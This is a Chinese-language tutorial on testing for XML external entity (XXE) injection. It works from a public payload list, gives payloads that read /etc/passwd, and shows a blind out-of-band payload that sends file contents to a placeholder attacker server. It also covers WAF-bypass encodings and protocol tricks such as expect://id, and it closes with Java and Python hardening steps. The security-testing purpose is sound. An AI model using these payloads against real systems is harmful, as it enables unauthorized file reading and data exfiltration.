3个步骤掌握XXE漏洞测试：从入门到实战

XML外部实体注入（XXE）是Web安全领域常见的攻击向量，通过构造恶意XML payload可实现文件读取、服务器端请求伪造等攻击。本文基于xxe-injection-payload-list项目，从原理认知、场景化应用到进阶突破，提供一套完整的XXE漏洞测试实战方案，帮助安全测试人员快速定位并利用此类漏洞。

一、原理认知：XXE攻击的底层逻辑

当应用程序未安全配置XML解析器时，攻击者可通过定义外部实体访问服务器敏感资源。典型的XXE攻击包含三个核心环节：实体定义、外部资源引用和数据回显。

图：展示攻击者构造恶意XML payload，通过XML解析器读取服务器敏感文件的完整流程

XXE漏洞的本质在于XML解析器对外部实体的过度信任。在默认配置下，许多XML解析库（如libxml2）会主动解析并执行外部实体引用，这为攻击者提供了可乘之机。

💡 提示：即使目标应用不直接返回解析结果，也可能存在盲XXE漏洞，需通过DNSlog等外带通道进行检测。

二、场景化应用：跨平台文件读取实战

2.1 基础测试环境准备

首先获取项目Payload集合：

git clone https://gitcode.com/gh_mirrors/xx/xxe-injection-payload-list

核心Payload模板位于：[Intruder/xxe-injection-payload-list.txt.txt]

2.2 操作系统差异对比

测试场景	Linux系统	Windows系统
系统用户信息	file:///etc/passwd	file:///c:/windows/system32/drivers/etc/hosts
配置文件读取	file:///proc/self/environ	file:///c:/boot.ini
进程信息	file:///proc/1/cmdline	file:///c:/windows/temp/

2.3 基础Payload使用方法

从Payload文件中选择标准文件读取模板：

<?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data (#ANY)>
<!ENTITY file SYSTEM "file:///etc/passwd">
]>
<data>&file;</data>

将上述内容注入目标XML接口（如[目标接口]），若返回root:x:0:0:root:/root:/bin/bash等内容，则表明漏洞存在。

三、进阶突破：无回显场景与WAF绕过实战

3.1 盲XXE漏洞检测

当目标不直接返回数据时，使用带外通道技术：

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo (#ANY)>
<!ENTITY % xxe SYSTEM "file:///etc/passwd">
<!ENTITY blind SYSTEM "http://[攻击者服务器]/?%xxe;">
]><foo>&blind;</foo>

通过监控[攻击者服务器]的访问日志，获取包含文件内容的请求参数。

3.2 Payload定制决策树

是否有回显？
├─ 是 → 使用基础文件读取模板（第5-10行）
└─ 否 → 盲XXE模板（第78-82行）
   ├─ 支持外部HTTP请求？→ DNSlog外带
   └─ 仅支持本地文件？→ 配合文件包含漏洞

3.3 WAF绕过技巧

编码绕过（第114行）：

<!DOCTYPE test [ 
<!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> 
%init; 
]><foo/>

协议多样化：

• php://filter/read=convert.base64-encode/resource=/etc/passwd（PHP环境）
• expect://id（支持expect扩展的环境）
• jar:file:///tmp/test.jar!/META-INF/manifest.mf（Java环境）

四、安全防御：漏洞修复与验证清单

4.1 防御配置指南

🛡️ Java环境修复：

XMLInputFactory factory = XMLInputFactory.newInstance();
factory.setProperty(XMLInputFactory.SUPPORT_DTD, false);
factory.setProperty("javax.xml.stream.isSupportingExternalEntities", false);

🛡️ Python环境修复：

from lxml import etree
parser = etree.XMLParser(resolve_entities=False)
tree = etree.fromstring(xml_data, parser=parser)

4.2 漏洞修复验证清单

1. ✅ 禁用外部实体解析功能
2. ✅ 移除XML解析器中的DOCTYPE支持
3. ✅ 使用安全的XML解析库（如Woodstox替代默认解析器）
4. ✅ 对XML输入进行严格的模式验证
5. ✅ 实施输入长度限制（建议不超过10KB）

通过本指南提供的测试方法和Payload模板，安全测试人员可系统化地开展XXE漏洞检测工作。在实际测试中，需根据目标环境灵活调整Payload，同时严格遵守授权测试原则，避免未授权操作。项目还提供了详细的测试流程文档：[docs/test_workflow.md]，建议结合使用以提高测试效率。